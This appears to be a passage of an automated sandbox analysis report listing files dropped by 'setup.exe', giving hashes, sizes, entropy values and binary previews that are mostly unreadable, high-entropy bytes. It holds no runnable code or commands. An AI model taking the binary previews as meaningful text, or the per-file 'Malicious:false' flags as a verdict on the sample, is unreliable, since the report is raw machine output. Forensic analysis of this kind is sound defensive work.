              Preview:.......U..D=.<`_....3yS.>.z..6.+.5....3mY";..=...'..P".x:.8.5&.j.r.T..}..Zj...j.z.."D...z..l.ox.+ic.."S.].h@D...R...X:.8f..=$./M........=..C....}(x..[B#...j(.H<...O...b..........I.-...?..pG..W..3'.2F....'.}c....<./..........,[.S2{AAh`u.H...2t.....]...J......kAC.Uu...w..I.F..s.a.8.......U(..P.T...v........R.E....I..z.........u.;......l.4A).?.K...~a..j.GG........V.(...q..Do.C.m.wJM.....t.G....Dr# P...K..9....f.J.4.S$h}.}...[hqrU@.....Gt..hk..K..@g...1[.S.`.%.....iB.....{.I..X....Y..6../.X....9.h...s:.....B.6W....2x..\6,... ...FN}}..~c.B...!....jo..Q.:cJ".".....iR.J....D5..d$P....Gb....M..aG.hM =D...7....NGM....n|......$^1..7.4.xzX.eP2...,.O.c..p.Q.j.U=jd..1......#j.cp.g.?C..w.....j.Z.N...v...-1Xt......OC.Mx.n.u WV..lG.....S.%.......|.....]$...U.H.|....b.....n.rl..q.#.u....4&.>:@-<s..&n.Q.}.>.u.N.xOE..t..o]... [`..w.&...S...>....f.....EA.q..tb....Q.F;.1k.(..2.....V.o.`_).2..n...nv..!D.....}'.yv...Q..q......i.}._C.N.....}.m.C....fk.S.n0.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.207954877323779
              Encrypted:false
              SSDEEP:6144:ukNxFjJGiqTnnfsiSfpUiLRMEt1uU3uhhf:ukbAZAecWEtEUe/f
              MD5:6AFB9F32F135C1FD1AD44D6B71CB7679
              SHA1:4DB21629E6F4D188A43BB2080F68AEA897B3298C
              SHA-256:02035F254D1386C95F4FEC9873034B4AC623140FB96D5CD46E3FE76B60D533AD
              SHA-512:F37E436EE64177CDAEE5AAAFF57CDE474E8D69327CEF9D831127FE0305F2D1F48AEBDF801ECC6820270E5653051F3EC40A858286B79F2CE5C7D854A30E7C65AF
              Malicious:false
              Preview:.....[.....WX~]...x[.-.DA.7.1...T..&.Vr..8....h..s....X/_/.X.o..k.P.._....g.%..QO.....BpX..$..),.!.]...........m.?}[j.....KJ....&.....4u.c.~..`.N.-....0F.....D..Mr..X'.......RL.t1.'.0u.3K..(h....&g.z.........C.C.Q9 .....2..[}..H{..$..%..<.o}...'...ly$X.........Y.....M..y..aA....k..V?.....S}.M#NU@...a..G.s.p.AQ...&|~Q..q./!.....Us.Ua..Gv......Wq....o.K......(..2..rD....{t.5.C..%.ti.......$..\...I...A..j`.b"!)V.....g...1Z.+.)N..4$..b..f.G..?.4X+....\...]E....l..,..0g... s"...9....&!.Y..1....+...xw.m..'...U..$..Ul.uJ[..'.H#.`X...W...@..!.[.!P....=..Y...B.t..]<34.....=.+.gD.C).3....R}..._... .F....'sZ..{E.....]..F.vO.....G.....kUX.........\.y."../ .P..V...$.kuBNE...=%.y.p.Do....y..X..lV.Oi.....+6...u.p.... .....9W.... ...._q.."a...h.r.D..9....._..}.B.>......s..1......:-.A...6...jl1.h.VN.E.@&.3.[..F.b....7G.......PR{c.b+N..2....~..XB)q..vwA.~..}1q8.u.....M.\.v..E.".rg.t.U...i.V]..l....BO....7..c..+..O....4,... UL.....9x.^7z.....u&...b.F(.9..f.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.208049572086897
              Encrypted:false
              SSDEEP:3072:l7CPPcDdqRuKiHpsZO+6va+BpCh8mVmMqAdu9U9e69ZwHZM8P3D:lOPOwRBiHpnzBpm8PMp9tnIMCT
              MD5:B7C21955ADD9B64C91BF40FE82DA7FC9
              SHA1:35FA4CC69769BA676553150C0C07D1B9F3BE0D8A
              SHA-256:8D190C3275C2929AB57AD6DA5AD5FCF0FFBD32FCF42057B913AB3A3BA0381AB2
              SHA-512:00C5BFC0A7144B04A2E5FDE6F7FE0B3A0665698E4149A55F6E47339F60D0F9C9065CB5273EFA7C77E3285E767ECAEC65B6DB0817339EFE13769C9EA6CA2D31EA
              Malicious:false
              Preview:...........m...w^..7X.)4.....5.8.....z.v...R.?.6.....3...a.... N9.....O...Z.'=....n.c....b..:.jh)Cd.&$,~..a)....Xq.E...g!..9.`>=..2..2...e..0.Q.........}.\....[..a.s........m}..#..|...`#.7y9.'...o>..P..%.6U.-....D.Vl...#h.CD.T..=w.Z.p.~LE-........d'..Q..d....x%.r...c.(?Q.H?...V..~..q.c.9@....$..C.....^0.M.fs...;S..QG..Q.p...;..6F]..."u.9...2l.9.Y..8\..L.`..[q.}.1..jQ.#\..>...X61..........,.P..../..(.-.G.^....58.x.[.PwZf..%..x........`......z.B.4".W.....b`zv..Y...,.23..n....LPID....[.!.>.....mF.ZF.m..9.IB....d..!.j..fR.6......w.>{.....Z...K."........w1.9... ..w.f].]86..^.........e&.....AUXhT.....R.&...6...}&.8..r.%G.....NM.n.i.o.:.qd..Kh.r(...'j.j...{+....l........z/Eq.<..GsH..$..X...3N/..s.e....XS.bC.&..a..oZ...C:Y{JD...D...D...A(."`.S.8e...Z...!...=.@3.f.y.)_.?'H....H.....v..eU.1.!..N.I~.9..[L...r.w.x]...}...>.].y.)_.-x.....tV,D...../u..Tc.cQ.X.x......9EDW............KS..>.$.l...s..N.g$T.uO..X.T.b..[.!.:.]....X...s:.......v..L.......N.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3384
              Entropy (8bit):7.9477874546429055
              Encrypted:false
              SSDEEP:96:JtZJBQFG8UnxZok7xdsdM7+GCfNRugGqOzoLwwaK:JPQFJUxZNsK/quqaK
              MD5:DEFA451C36343689C6536A3451993D66
              SHA1:D226710C08B6DD4777D360C75C96F9A955859887
              SHA-256:665AD23886D5DD429DD955A31676B6F4BD1B7787A7CCC7A299D89645586D4A99
              SHA-512:44449B6F55F78BDB7FF38FAF41049C1DDDFB2176AD9D170D1F8EE74BB41F2B481B4E9ABF20D8FB83C7451B7F536B3880FF75F9989436F8BF1CA8E142B7BEDC08
              Malicious:false
              Preview:<?xml}.B=CVom.(]We....8.;..27..u.EF4H.+.....5.|..n1.|..t.!...Z.4.&.WD..E..k.....".}..ET6%K..Q.S...(R.3....O.0.x]c.....?%..<....w2......[.6.....5.......V...9.;..w...z..O....XI.=..W.oB.E..<...R....=b..-6.h\.vD....8.VKh..t.....On..g............{.c.'...L.....y.........K.9.}......(..X...3Y.a...3.......5......:..i)...cZ.S....."5.>..6y\.F..t.(.....\.......&..^.o....lQ.!.).fI..Y....?P.|..^........0.z..U.T...$.M.....0I."....]..FS..... ..M-R-q.n........?g....5...j......3.;.B...QO.jjx(...m..+.M...Y.......8~....C..2H...../^....\n..-.V....v.>....J.q/.*.#@......K......._..k.W....,....e`j.N.....g...#......<.:G...Ok<.].m....UX.:$...~...IJ/..Q . ......W_..>fz.N.q.4.....o..@.l.....m.i..r.?...r.40....H.+.....Rq..;.o.<....U[..w..% J..Y!jub.".%....-...1_.q..q...Xs..P........a..F].7^_%..t.Y.B.<.&..e+...z.RS.....M....-.o.x...s.h.....2..Xr%.3mo.......B`..d.R..Z.nv....F..aH.K......B..!>...v#..$...B...!..2*..}..x.7.`f.....;x&.e.u.hY..e.DF.Q......e.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1062891
              Entropy (8bit):5.5304278351076395
              Encrypted:false
              SSDEEP:12288:X1cBaYMcPinIOXSZlV0N8x5thr291gess3TylunX5:FckKiV
              MD5:927276E7F0217621BA6E20D958D12E08
              SHA1:800363EA814553F5C5D2BA24FCB499FFFB820EB3
              SHA-256:3E5FECD14910AE4FFA26237E38BA469C56065C98B72A5CF3537D764C40F7AE68
              SHA-512:5150F75FD2DD42DC807790C501676569DDBE85267050CD951825705505B8C6D258844522593220E489B38D7C85BF0BA51BB2C63F5CC9A6A7873112E4739BFAF6
              Malicious:false
              Preview:<Rule.4F..Y....x.{..F?-.gb..0qCq...^....9~...Q.X8.rd.Y.q.?}u...$....I..8Ih.1.f...E.?...J.**..7.....j.....}Q..%.+..|iMUKX..E...#$...f!.A..C. N...P6X..........%2i...}..."...F.....J|......yt.q.u.6..wo..)y.1+..c#.%.._.U..(E..N.......P.............E.....K...pp..wZ.hh...G...3.]...+."...+.>~...(.FH..?7....V.r..e..3.Y.."SN..r\F...Y.}.\.2)&b. .*.J._.#.Kz.G[W...d.-.kW..._{>.@.9....... .I.....wE..E.R..m".../.lB...HE=TG...%r...8k.:..q^.4..Q..da||...z....~r\].a.H<.I.d.j=..p.{.I...q6.%sm.*.v.....>f..X.g.'F....I.8.s...k..{I;n.NY...A@xO.ur..).....&..M.;9(_@U...l...K.Fp......F....d..U.y.........+.#tT...,q..D'a..g+....b4.~..a....0.......%?...>.*..u...g..1...._M)....|........u.......v>.Ti........;..J/..5r.2=..c(H..U.....m.:.T.....4..O..l.....qK....g)p.YL.8......Cl}....Oy.5b"V-R../.wTE..D..[./edxt+.q.N:."K~..@)..f.VWJw.TL"..E)..D.z.=X[.;...A..$.1.9......!..-.p..V.\..o:.%.Th)..H,.I.....u.0..W...`.E.%?..Z.Bx.X.t.......8..L0....gg..m.....>..J.......'..2.._
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3363
              Entropy (8bit):7.937889216220232
              Encrypted:false
              SSDEEP:48:Zo+YBVd/Noo0oe3dt6U4ee6hJ9D68DnNYyuhP6po2aI39exw/4SuZN5uUBuD:ZcBvlEjt6MFTD68RYT6K2aIt1/4lbW
              MD5:1CD9330C84FF3030ADA6CFA4390BA859
              SHA1:C8FD011D82CFFC7D08577BDB90D503EE8EAC63A8
              SHA-256:58A7A4D23BE3A6CFC593DF752F5FDB91A15B91014A9C82CBF2EEAC18FBD7D437
              SHA-512:8A08E7D5E15106F10AB8B95A7FDBE6C91773CCD29AB495EAEB95EBC8A2BA4B5A739D4B5ED8DF4F7ACBE454CA9BB540CC35C98A72FA37600AE1A350B2B015D1EF
              Malicious:false
              Preview:<?xmlYu.P.}8.Y.3.H.....8..o...c.....k.;.....D...'k...w.4r;LS 2.....,m.d!....+..Xi>..k.>.....t."2u..HN.jVW....i..2Q.|S.........{.1;?.3..<#.z9.*..zb...m....R.-$...%.4:I3..{...bY............7.o.m.tH...7.\.%.$W........M...l..FX..I......J&..I6G. k..........-.y..m<....6.-......`.|g.."@..).q.?....GI...{,..9N...-.[[v..>..I..+D5...-....N....Mh......0.|..........&?+.I.1.p?.,..jJ". .~.;...v.....<....SX..}.g_..VQ..m.\.!.6..k..MviQ.X`./...1l.L.7#.O.mg.+...B.iSj`...P .)....k.k....V.+^.S.77..B...P...%........H......n..-a. &..-\....!.G.>."...t;9.kr#/-..>.d...{..0.I*..O.[..0.~.;...Y...Th..D.....%.......x.S..>._.$...[.Q...0^.........xh....`.S.........pW..?Ox.+......;mU...(.u~R1.Q..2~.pWI.es.P........Q.+=NN..iP.<T.WC...nQS.....yC..RM..|&(..E.....,>.J#?........,.-..A.....^.BZ..__...t..Y....E:....0&..ie...'...]......\R.<.$.&.T...9..vw....R.#x..[......j#..p....h.. ..._..&....vf!.B;.(...:.....c..i.Sz...^].RKV...;'.,.-...i..J....g.i.A.Qo..thg...2.Tpt;.S.......L<,f..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1295
              Entropy (8bit):7.847394373559402
              Encrypted:false
              SSDEEP:24:SqbZrACqFtEkBVkW3RXfGHXNC70eZzwYWcuhVB1oQ0D+BkmMghuCSHebD:Sg1A9rEkQWRrvWNhV0QVqmMghnSHcD
              MD5:6FCC47514F020532B91F6A44C9C68CBC
              SHA1:EBC03653115780D070220D4E3B7446250894E320
              SHA-256:E1FA9803756F374C6F8195AF49D0F4E9ABAF401115E248B8711B0130254EB76D
              SHA-512:CFB0BEA2C92E04C5770D10769570E5E0F7857CC98E71CC6477C34D3EC04345C77929753E32153420F15EFD2AA153AD6BC2C6AA464A88E053D7ED91C28BBA0038
              Malicious:false
              Preview:<?xml..F&.,......Gu......'...2.,E.<[..A...._=)Gc\?...e...#m.Z...'..X.g../.....h..#..(/...........2.o.j..]...tz.^Q6..r(Y\!/\.Q......A.......k.G!^`u5.je.+FA.y..K.....4~)|...LA.....z.:..;.e...R.....e....V?.+...[..L.../..k2)i.ZO#....K..q.~2.,.RC.x..A...m.g.z.....K..O....&`.....G$...........?...3.N.7.@.....?..|.!(.n.`..V.......D.%.e..zG .M.|.. GA.0c?.g~J..>m4,.b......T..9z...D%.....<<.:.4..u.z.h.....L... .Q......C...8..9$6T....8.....X.3..#x[PN....m.+S.Sy....4.T....mR.;...w. ^.mZ..`....2.W.....bD.zOZ.h...e.........5.&xQ....CFg..f%9..r....`...4{.Z..............4.3|..3X$f.Jg....;..o.+a..-).Gq.|.H..E...t..E.G......ZK..j....N..s.....Y....,.Z......xPpKy"&(M4..e.-,.D..>........w...6F.U.oQN .....lCA}...!....$8....Z.;7...mw.ep..9k>{.....=^....B...6..Ml..3K...rz.c...f....Z...7.9..*X....M..G.....y"..\A..T_..Pi....Q..jX\..~2...k...f..f!.... ..xP...4...\W.OC#..5.y+3.l..O...2.l.....]v............8..4.H"...}zZ..|...~..j..1.e.d......4..S.q......&{_S.v6...7....V."m.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2582
              Entropy (8bit):7.927542076738295
              Encrypted:false
              SSDEEP:48:MjbrJUOoYfvYVsx9Soj/CMfogVjPN+fneSiCcms1c3DN2PPU/RyKD:8UZ4jjfogVjPwWXCcms16NEMpyC
              MD5:5ED45703CE4EC1CD4963623DAC822032
              SHA1:4E98CD71B25E778D5C0A0DE63381676F92FF0015
              SHA-256:8B7072FEB3E6833E1AEA8FA168C36D620770C85DAE7C09558353B0ACCC646543
              SHA-512:D113D46A935711D0B5B3EFC4DB877F6ED581EC969445F9BCB1AEEB22A5C543D79A3899AE358511536B7770A2DD2446841D3506FB755172F2DBB1269611829008
              Malicious:false
              Preview:<?xml.f..#..`.C,..5.4,.Zl..n.nsW^.....z....$.e.....z..Y..o`.w.o<.U..(..>.'.......D.m..$+.cX..2"...3S...h%..<.......j.,...x4.2..<.H.z..wG~}.....G.T;.}8...R...gce,y......3..Yh}.\.v[..k...2...<.Z...w%x..3....j..~....`..h.......P.......:..n=m.....Pt...KV.W.....\.J...M.LcH.i.......*.Tw..c..$...-...y..5.Rr`...f........A...2.zN...^b..)d.DgP...<.i.@.^..nb.Qc.u2...f+{......#.....f.i..1.......v..!..M...8.q.J.k..5..is.4!.......c&.....P....i..[...x^(...:.e...a5..P.3o.L...D>b.b.9V.i.".....o..F... ..Ut.+u..V.qw/;..RC....p]...M+\..y.l.."C.....|'a..`.a[..^.HPs ..6....`.qu.2.KC.U .._ey..{l+sp..P.....p.&f............{...b...z5...$.CB.L.......mEAU...6.;..^..")t.r.-.W...4..*a..J...D.k...@O.d&.f.y....U.......yC...T\SJ.. Z.a.Ho...t..w...B...h.]l...X8....r..;.u/H.M.(.......f9."......pe...nb.Qrm...%..&..e.E.[&....F...)..#..&..e...z(IhW~...k..,.....>d.}nq......6.....'K.(..*.CK9.-..gJ{..F..\...].cz.@.7........L.U*.4...u..|_4..........j.:1!Q6.{w.......<..|.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1787
              Entropy (8bit):7.896367727192489
              Encrypted:false
              SSDEEP:48:HxxLUv8x99XOUeqiA0gzW7I8y3ntU70tDDlawY8KD:RxoEVXJeoXYIzntUGaw9C
              MD5:CB5B630CF4D42562661269512CF19E64
              SHA1:EA8BC698808C671AEDE6655F0319C3A97595AA0D
              SHA-256:06DCBF2B4D79B2F3C58B33FB5AA1074152E51BE37BD24AD7497CD0B3542717C0
              SHA-512:D57E98BBAA2E2D2135A5D475C3066B9AE82F91E88F56D6B449C0D6D87406CDCA70E92A5B9B1BC43A2B03FC221966D76393DADF72D1194FCCA32625295629CFA2
              Malicious:false
              Preview:<?xml.....P.q&av...J.H..ke..'...n8..A.. ..a8...n.LY).W.".?...Bj..;....Y.2....0....;z.N...ny....n...J...Q.h?.3.'4~X..Y.:S.K.V.$.u.5R....X...#99b..[F...j..y"K9.Q..X."....L.).P.{.f...O.!\...B.'.4....L..Y.:=\.f.... ....7| .../......C...uijl......}X.v!{.[...L5.~^:y..F....J.}..*=u..g..XbEY2.. ...s..M..../.I.B.;....G....y..3<]......ky....3.:9..C...y9.W..DMj......M....o..eE..T:......l6........I.)2...iZ....Jl....6....})...I..)ap-D.......h..u.h....Ta..X.G-...<.;LML!{.G`o.._.."..u.>....1....~T.`.V)e.zk.^.Q.MubJA..zKx.&.FO..-..|i...7...`......0' ..7..1f..j.....9...4A...}"...I5...'b.fA..nC. e6...}.V4h..RR..]x!DGq....HK...[._.Uy....\......#.j......X*.N.].g...X9U.o.g.:/}AM#.<......~N43t...I.C....n.5."_[.g.."..=..B..8.X2.m"..+...l.J.=P.C...]+..;.Lh...X~Fw4.Hr.V.&D5C..XDM.:_...Y.\..xTU..(&D|....).K.t........(Y.+.hO...X..@....~]p.\.2.D.$L._...c).=./{...37_.t..<.6_.m.{.....~.-....m..R.{.e+1.....,.~....k...4......)..._.>......k...$L......g..05..D.-....{..#.W?.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1583
              Entropy (8bit):7.8738715859711705
              Encrypted:false
              SSDEEP:24:AnU7lwYHzGghaXIPTbR84Fv4gvaHTBJFI0V8L347Prop6cH4dQD4i20TY1xpbD:Asij4ZZfvoTBJqK8Lo7QGQEP0s3JD
              MD5:FCC97F454FB70E0FB271749E55478875
              SHA1:FFF4BBA36DA13CA08D9C93B0BAEEB3B5F7F573B7
              SHA-256:BD356DE32DEF3687DBBCB27E33AEC6ABC9AB1ABC3872AC4C9CBF20354090F3AD
              SHA-512:A4B63E9C67A5F29C199F4B2FDAB8992FAD515E221683A4204F42764CE53BBE6FF2F88851D22203101320C845F6C9A99E13C748E370565DC38924308A1CEFC128
              Malicious:false
              Preview:<?xml}s.~.....=.z~*.:j._....H/.....0}7...%7....u....|P&NcO*.f.*..F........J5U1.#..~zd.s.U.....9.. .........c@.._0h.... P.K..@..c@mA...b.0..H.V..o.*N}a...4.0i4.....-..........M.=.w.;.F.......W..&z.. .t....&....[0......3..<N.>.zS..n.el....!;...A...:.TB...!`.*~...Tr...V.M\6......2.M.....A..5..5..+.b."..0_/.^.....[.S$.....5...I#..P.J..6+..hs....h.fU..}.....S.."...8;....w.?]g.....6dM.....Rd..+.R.}z..[.....eR.P..js(.v...d.i..._..>.q.qr.......Z.=. ....!.......]l17d+....G>bd3......[b.2...).....=.Y.:i..{.fr..."%.[dm.b....UM.JG...=D.*,V..<..D....>..G....^1.....%..rqI.<8.....S.A..%..].m...GO+S.. .....}P..E..v....v..=~......{.i..9..+.C........Gf..]V..W....)...L.......z.6..7..*.T!.....B.......Z..H.y...8.nNw....O.S.S.q.S..*..`S|....K|n.t....).U..@..'*to....Y.k.....O..7..N.q..#S....%|m....la...D....,..n....z...W...0~.....x...#.i.P.t...h_....B..t..,.....c...s.vy.....nZ._.&.1h...&hK.wM...fW.E..'..Vw.....tA+ZJr>......^.9....b..6R!.P...m...@.-...u`.L.h}s.2.d
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2801
              Entropy (8bit):7.924531561191622
              Encrypted:false
              SSDEEP:48:5zblm9CFwb96qyv7DZ3E+FLG8PJH5x8gRg8WlsG9BrsarMvr+TIGYXxwfbB7/D:xOCFwtyv793XLnjKRhBgaoaWG7r
              MD5:FB13374FA44AB5489F285D3D5F2C0FC1
              SHA1:168A45CD9BD741341D9C27E9768D3762238AAB3E
              SHA-256:AE5F96435E8C118E414BF78FC6560E7CF010507DE533A5ABDBEACCA94E7BD0C4
              SHA-512:2B6FF974146C09AB37A94D69730E66EA52E2FD04203DAE67C2A08121CC08E96F771704F12FA04AA8F6225EEF75ECBB52D6CA2CE4F4371E079D87E953148A6494
              Malicious:false
              Preview:<?xml...a)s.J.>..hWfN.?..Ll|....V2E......s=..j?.Z.W.S..D.@.@..v.N..H.8..+...u}....m.O.....SIYC.,.....".n..8....9.tE~i5..t....K....y.u@......5.x%PhdqT0>.5..3ICD...Gf.({...C....Ha0........l...t.t~.P....du!...gE.!..$..o......Q]....R.?.......YP..-G.U..7.w..!c.......&.....xF..y./x..U..N.52...)?.z..oX.%...MXqD....s..d..m.... ...>......#r.&.`..o..1>e...w..../2......Bh.E....a. ...J.s+~...JCSw..2XS!s...N....i...%.F.5..Z.<......Fh.oBT...W.~...q..T/..).........;Lb... .l1F.V.4.....z...M.qq.M...gLT?..N..d..&...r....o...:X.I..O..[....h^.qr..s.....*.WD...:..x].GBX..P..d=...r.n....:<W.'..ow..z...5.E......Atw...f.2.mU...#.`...p.7...T~...y...|../B.....w......iP....:..].M..v..<..,..h?,:WD(....".uH..c........KI..Th{...-9....... Y....o#z..~..........f...r.8S.UoMU...lqr}h......$..Q...*..7.v..AAF...x..n..>[....$m...m_m...m.....du..........Vv.........^m...$..Q...KI's9.1.)..x..>...Af..m.t..V.M...@.l...`..."...5...Y..?)s&u.Zf..jU.L1..\..-.%_..!............
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):4121
              Entropy (8bit):7.951175214630723
              Encrypted:false
              SSDEEP:96:K36Z+HNbk02EORx8MfIj7gHoOpmM5ATsfDV+5mG6ya:KwjE8x8X78o8pBMU
              MD5:A18DE337B193005A7EE66EAC87BC8145
              SHA1:5AEA0815394AC5FB6CDA3A353E78CC56081C3D99
              SHA-256:9C6089CB13239E494EFEB5B8AF165F45248A6AD9C8B340EC65C014A66462AF28
              SHA-512:40146B07DD972C935210FDC6697A9E30C3E43BE789C953C8F0C8737EAA9C8DC8BB42A9794AC44E7BC99FD10B9702E40731BDA51CD3818AF5AE85B6FE2F76861C
              Malicious:false
              Preview:<?xml..^..6O..W.+D.j........w.`./..M.+r.....+Sx......../...]....;i..V.+..w.(j..[.k...uwU:<..n.az4.Mq...}...SqY.^...J...."%...C...a......<^..>.0 .0...T..W.....g.....(.K.7%t.Fe6...!C.g...u.*M)......4F.~&.$.......mu.GqDt.......~.<.......l.a..A........M.Y...v..ft.#..l.y...[..=QS.....g\.H.2x...u.`.aD"XF.h..8.).....[V.|\f.?j...~A..O...V.....I,.'...X.B:.*.R.,.M.\pQ.........|.V..I....$<I.........k.}-t@KI...|;E....-+xe......+...\...-.(AK)..I...b.?.$cj"..u...c5.?..6......3.D..o.7_$.....V..5.`G.k.....@.k:.t..B..f+.C.a+...r......w...E..'.6.#....o.....S.~b..,G..e..l..k.>V.d.h55-...j+......'.IWg.<.2....?k..\.=&..'.ihO..l.rzj....Yy....O;.X..&...v]...o...\.#XS.i..jZ.q..W....mH2M[..,q._...qOb4..Nd..Ob.e.#.M.H5h6!!9....&.yR..b...._i2..J..<..a...8..(............Nz............$.m.S...d/../.3[....?b..pN...*.$..X..ds.~V.m.r.](..".}._.".9BFF.K>C.H.K"..+.Q.d......f^._.........{Uk...e..o.Q.;f.b.q.Jqq./yN.. r..'..W.m.%.+3(>......(0h'g>..-d.3......]...I&k...".
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):8140
              Entropy (8bit):7.975242222623851
              Encrypted:false
              SSDEEP:192:Jr/GacGpCEexi1PJ+RwqZfP48dUcaIrfF74JpHEIzX:JrTXsEexi1PJ+mqZfnEIzF74KIr
              MD5:598EBB8BE633D4E5EAC3BA35C7B3526D
              SHA1:613DC7176B1F71CAF467D48B11771DB4CDED9C84
              SHA-256:50C8DBE897043A56FFFED160249D689C2ABE12FB418A43420C8B02095273C9EB
              SHA-512:175DAAA0E248076B40A6747911FC000395E4060BA0B2654A2C6FAB8858E3555C3E452278F68C5F32233BD177D04C32D4ED5E47F91D62B8DFD2DFFA35D4371796
              Malicious:false
              Preview:<?xmlRf...O.yk.b-o5..M5.7{f..'.gY.}.^H.........>l.M..[..B.....%.'...c.+V.{..`...@...QMyr/.:...x..>,j8....s.......'{..m..2._...3{.nq......J.q.@......+..._.=. f1.&.0.~.5.C..l.e...`I..J<.-)....U@YS...ATR3.G.._....A....*....J...q*.w.....!./..GCY.....O..p...JBA.a..5.?.X._......o-=.,.qX.0I...j..?..}............ .G.. '...vPp...u....>m`....DI.jV....@]Q.;.........f.....7.2,.2?Q..10...ec@.......l...t.s......q.(.......`L...k.P.Y|w0..;]...M.F@...c>.[`.i@.y..;.H.9MU....f..`......co#...Q.....<....ONFr...@E:..U].......k^.*.q_.)ly.4.w........."...f..:.......".@..N...<...g.....S.a...) .>V...2..;.&....u<....oTg;.a.^S..d..W_m}y...EP..t..Xq$a9..".og..........H.C....C.:N...8..E*-..D....j^..$.N..gc.)k.vt.M.b^#.....)..e9.}.q..q....|P...sc..Rv`~..S.|..._..'...t..cB..p..k......de.@.;.=.E...7{.{GP...F.i.u.9~.7B.^.P.=..TP..E...x.....w=[.......)........C(.N|z. .<P._..R.0......[.Dq.....I...... .......7......[C...o. ..r.=.I..SO...z...3.E.....L...U.O.V.E.0....K.h
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3313
              Entropy (8bit):7.938430933236305
              Encrypted:false
              SSDEEP:48:C8umASp8k9YoML545O01k24Dkno6IDSZ2vFqIDk5U3z/FjwIo4S/UjJBvS4D:M4p8MYd5FDAo6IDSZ29dDvz/uIwgJd
              MD5:569879CE8B085C75FF0A04C69AA4EC10
              SHA1:712B2DE01999B2ABD4C9EF4064D9DEEE90F820E5
              SHA-256:F993762BCEA7A8734D8120EE6B2D3183233C30192F37AAEAF03EB85A8DB55B6D
              SHA-512:B9D3C30B976419384BB49F97028D8790139F69D2A693A5BAC2E4FFB768EFA3CE46F6DDF49E8B6863637DBE7D080D8E200C0805F82FB03B7F6545E3EE1E5E647C
              Malicious:false
              Preview:<?xml3...,....}NY...+.l*...K.pv.DkW..Z..D..h.QZ..T..o.o..#.n"...}.r...#..b..Q.]i.........m....^D.bY.E...*...a##..).WsO..H9.{....i.q.E...w..r.<....R(....m..C..w.z..I..O.#....8y-...}.u.`}.B....jD......^..1_Vb.._"...5.N|..zF.....'`..!..G%Z.2-H.............+.Aj...x.)l.)M*f4b.t..-...;..1M.~..#.9ZBA.K.....-.i_..r.'S..<.G....vQ..5a"...h.y....1C..6.s.+-_.9.........sW..n.i..)...1u.lms.?.o.A...q[(@....S.*{x.*B.-..c.N.,.+.. .J.....o.....7P..W .oF.C.....V.Xd...q..j.i..f*^e{.h4.........._p.=.W.7msn~.....N..<_..s."_....8.d.....)...D.N..f_}bk...."C.#....u.b,.X...*.g..r8..Q.*...Id/(.}7......_...AA...`\O~-I...k.6.6.nX......S....%..f{y.h...@>]o..\.A.k.5.n+.?L....%...'ff....~...EvP.7..b....X....>..CV.az..4{G...W1...[.H....I...G/Ym.(o"...,W6(.-.;.".]o...xNf....._..c.'Q...\.-.dJ..L.|....}3!om|..L/LM....O/...YL.3\[._..2...v....".P.t.p..r....X..4./....?..........].~...]..e.0,..... ....*.I.FZ......r...S....8...o7.....?....w....C../.K5"[.0b.Dr..pO.+6.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):3675
              Entropy (8bit):7.948816868302436
              Encrypted:false
              SSDEEP:96:9W8/9g+mjcIpBjGpKzLq78eQAO6bVPo8JggGW9+:9WggpjcIpFVzmowEaH9+
              MD5:DDA48368836C64A19CC84F2130036748
              SHA1:8586CFCB8D0064C583B406DA1EBC89A2BB442AED
              SHA-256:92CC61387DCFCD2C7F46C788A47130F476E0FA898CC5C268B25B5D4F5F42B270
              SHA-512:AEE9B7E9F9BBDD7BBFB85052D10275B0973F41BA59D3A01DCFB6B62010BE227125656452FA6F9B5C316C98F3464132895B0DDC37680D09BEB8293D5690441FBC
              Malicious:false
              Preview:<?xml.p..<As.7...F4.MQiy..6w..T..x.(.O.E|..._.g..K..%...>.xK...~.CF:.....t.....;.%96..?...~X`.h[..hzNL3$,...{V.(X.....r.....0..*.m..t..S.....UF.5...).>7..(Q...x......o...:<.p.?.t...._...<(..?.....?..#.&0.I|.l.[.hl....g"..Ph.....L.....CL...c.l>...G.D`...._ .e^...-.:,.......:9.[)........u.5.f.;....N.C...uwu..h.2.......k........@....A.....x.....(...cy..d.....Ns*..8.#U../.....z.&i.b.=.0...-\.g..E.o_s+..:1W..G.KV'.|U.,...>.:..H]Gh...Z....[..p,.O.(.%..=M.7z.-..;.. ...Q$2...9._...uz..j1OK=..a......b ;c......z...J./._.4.C.....t.t7{....4..b(.S.....Az[.B;..s.....?L.*$sX?.1..GV..r.....8,&F.5vc........v..d.`L..u8;....).4i......ZW.n.+.g.y$..D,(.;....1.a..)*...~.....V.(.]$.P.....A>s.s....:.p..z6-.c8.).p....!..,u4.[e...w[bY.C.....kJ.u..s......R..H"bI..!.L.4.....!...=..]y.R.72'..@Iw...`j....;..T*1D2.k....y.Z..H.Z..f..@F>e..*..(p....E..@.].Qan..~....R.j+W..jv....Gym...&(g.?I...Bu.Q..D...\.O.R....p...5...l;].wY,..b.Qb..W..n..2..ei.p...h..l..F......]J.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2924
              Entropy (8bit):7.937369761185222
              Encrypted:false
              SSDEEP:48:CGYPFWJs8Ri9wP2ALRHP9Ul2BhnJdldiqi2pKMp08r/9HhffGmJ2XvkJ1ZQRD:CG/eVALRHVMoNVWRE/C4ZQZ
              MD5:67980CFE498FBF579626B764461C58FB
